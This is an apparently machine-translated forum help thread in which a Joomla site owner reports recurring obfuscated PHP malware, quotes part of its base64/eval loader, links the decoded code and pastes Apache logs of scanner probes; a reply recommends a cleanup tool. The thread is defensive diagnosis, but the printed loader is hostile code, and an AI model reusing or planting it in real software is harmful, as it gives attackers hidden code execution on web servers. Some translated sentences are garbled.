我的服务器某处有一个洞,我需要一些帮助来堵住它。一个包含base64编码代码的PHP文件不断出现在我的Joomla网站上。
起初我被列入黑名单(kelihos被列为原因),并发现我有许多PHP文件,其中随机但对人类友好(login.php,file.php,alias75.php...),Joomla目录中的名称。所有文件在函数之后都有脚本的主要部分base64_decode。以下是此类文件列表的示例:
-rw-r--r-- 1 www-data www-data 155232 Dec 24 18:51 file.php
记下日期和时间。圣诞节前一晚。这总是相同的 - 文件在早上 6 点显示这个 mornig,日期从 12 月 24 日开始。这也许是一个线索吗?以下是实际代码的片段:
<?php
function jqgwuawwjs($rlkr, $fikixpq){$wynuczq = ''; for($i=0; $i < strlen($rlkr); $i++){$wynuczq .= isset($fikixpq[$rlkr[$i]]) ? $fikixpq[$rlkr[$i]] : $rlkr[$i];}
$jeb="base64_decode";return $jeb($wynuczq);}
$ldo = 'dGCoZSRV5id3buS9XQR9iuMT59Xg1zcSKz0Ok0OUZYcOipECsx'.
'aDIGRDiuS9XQR9X9Xg1PUOk0OUZYcOipECsxaDIYFHiuSH5YE2sGCTICR6ZY2Cb90ayxqmxq7V5iWv'.
这在接下来的1900行中继续,并以以下内容结束:
;
$zmdjyoxo = Array('1'=>'I', '0'=>'w', '3'=>'o', '2'=>'1', '5'=>'Z', '4'=>'q', '7'=>'B', '6'=>'0', '9'=>'y', '8'=>'6', 'A'=>'K', 'C'=>'l', 'B'=>'i', 'E'=>'N', 'D'=>'n', 'G'=>'G', 'F'=>'F', 'I'=>'b', 'H'=>'4', 'K'=>'T', 'J'=>'8', 'M'=>'x', 'L'=>'L', 'O'=>'p', 'N'=>'P', 'Q'=>'m', 'P'=>'D', 'S'=>'V', 'R'=>'9', 'U'=>'A', 'T'=>'v', 'W'=>'R', 'V'=>'z', 'Y'=>'W', 'X'=>'c', 'Z'=>'a', 'a'=>'g', 'c'=>'5', 'b'=>'J', 'e'=>'t', 'd'=>'Q', 'g'=>'s', 'f'=>'j', 'i'=>'X', 'h'=>'U', 'k'=>'O', 'j'=>'r', 'm'=>'7', 'l'=>'e', 'o'=>'u', 'n'=>'h', 'q'=>'k', 'p'=>'3', 's'=>'d', 'r'=>'Y', 'u'=>'2', 't'=>'S', 'w'=>'H', 'v'=>'f', 'y'=>'M', 'x'=>'C', 'z'=>'E');
eval(jqgwuawwjs($ldo, $zmdjyoxo));?>
当您将 eval 更改为打印时,这就是结果(代码对于消息正文来说很大 - 这是指向 pastebin 的链接):
http://pastebin.com/xcY3wQs6
我从服务器中删除了所有这些文件,更改了root密码,mysql密码,joomla密码并为joomla管理员激活了双因素身份验证。
一个月前我注意到了奇怪的行为,但在调查问题(可能与此有关)之前,我的提供商 - Host9 遇到了灾难性的失败。这让我没有24的网站和邮件服务器。12 月 15 日至 12 日。1月16日(!从那时起,我有一个寻找这些php文件的cron工作。当然,删除它们只能解决问题的一半。问题是这些文件是如何不断弹出的?
我有一个VPS,上面有:
Ubuntu Server Linux 3.13.0-63-generic on x86_64
阿帕奇/2.4.7
PHP 5.5.9
乔姆拉 3.4.8
该文件在早上 6:00 之后出现,所以我大约在那个时候包括 apache2 访问权限.log:
61.135.190.71 - - [27/Jan/2016:22:56:31 +0000] "GET / HTTP/1.0" 200 430 "http://www.baidu.com/s?wd=www" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
208.52.154.243 - - [28/Jan/2016:01:23:44 +0000] "GET /dbadmin/scripts/setup.php HTTP/1.0" 404 458 "-" "-"
::1 - - [28/Jan/2016:02:56:54 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:02:56:56 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:43:36 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:06:56:03 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:11:58 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:20 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:21 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:12:34 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:23 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:24 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:13:26 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:30 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:31 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:26:32 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:07:29:28 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
78.155.39.214 - - [28/Jan/2016:07:47:02 +0000] "GET /phpmyadmin/ HTTP/1.1" 200 3570 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=79eab716479466d5c44116323db94bb0 HTTP/1.1" 200 17157 "http://207.210.201.88/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
78.155.39.214 - - [28/Jan/2016:07:47:03 +0000] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=79eab716479466d5c44116323db94bb0&nocache=4147360344ltr HTTP/1.1" 200 17556 "http://my.ip.add.ress/phpmyadmin/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0"
::1 - - [28/Jan/2016:08:03:53 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:55 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:03:57 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:01 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:17 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
::1 - - [28/Jan/2016:08:04:18 +0000] "OPTIONS * HTTP/1.0" 200 110 "-" "Apache/2.4.7 (Ubuntu) (internal dummy connection)"
阿帕奇2错误.log
[Mon Jan 25 03:30:13.688765 2016] [:error] [pid 25830] [client 95.213.177.123:41264] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 03:49:23.091859 2016] [:error] [pid 4517] [client 208.52.154.243:37227] script '/var/www/moadmin.php' not found or unable to stat
[Mon Jan 25 07:40:45.016456 2016] [:error] [pid 19847] [client 95.213.177.124:38892] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Mon Jan 25 23:50:34.056409 2016] [:error] [pid 2434] [client 185.25.151.159:34885] script '/var/www/testproxy.php' not found or unable to stat
[Tue Jan 26 06:47:48.641496 2016] [:error] [pid 6043] [client 95.213.177.122:42690] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 10:58:48.569545 2016] [:error] [pid 14076] [client 95.213.177.123:32251] script '/var/www/azenv.php' not found or unable to stat, referer: https://proxyradar.com/
[Tue Jan 26 15:06:42.084295 2016] [core:error] [pid 25454] [client 169.229.3.91:42376] AH00135: Invalid method in request c''xfdF'x9c'xd8'x02'xb9N'xfa'x8d'xc6J('x9c'xb0'x04'xa3%
[Thu Jan 28 08:01:43.830310 2016] [mpm_prefork:notice] [pid 3932] AH00169: caught SIGTERM, shutting down
[Thu Jan 28 08:01:44.884060 2016] [mpm_prefork:notice] [pid 26468] AH00163: Apache/2.4.7 (Ubuntu) configured -- resuming normal operations
[Thu Jan 28 08:01:44.884678 2016] [core:notice] [pid 26468] AH00094: Command line: '/usr/sbin/apache2'
[Thu Jan 28 08:21:31.499215 2016] [:error] [pid 26475] [client 78.155.39.214:50308] script '/var/www/phpmyadmin.css.php' not found or unable to stat
该代码看起来像恶意软件脚本,并经过编码以保护。我建议您使用程序删除它。
尝试纳尼亚古尔迪安 , http://github.com/Pilskalns/Narnia-Guardian
尝试使用上述资源从所有文件中删除这些编码代码段。这很容易设置,也很容易使用。您只需要留住患者即可。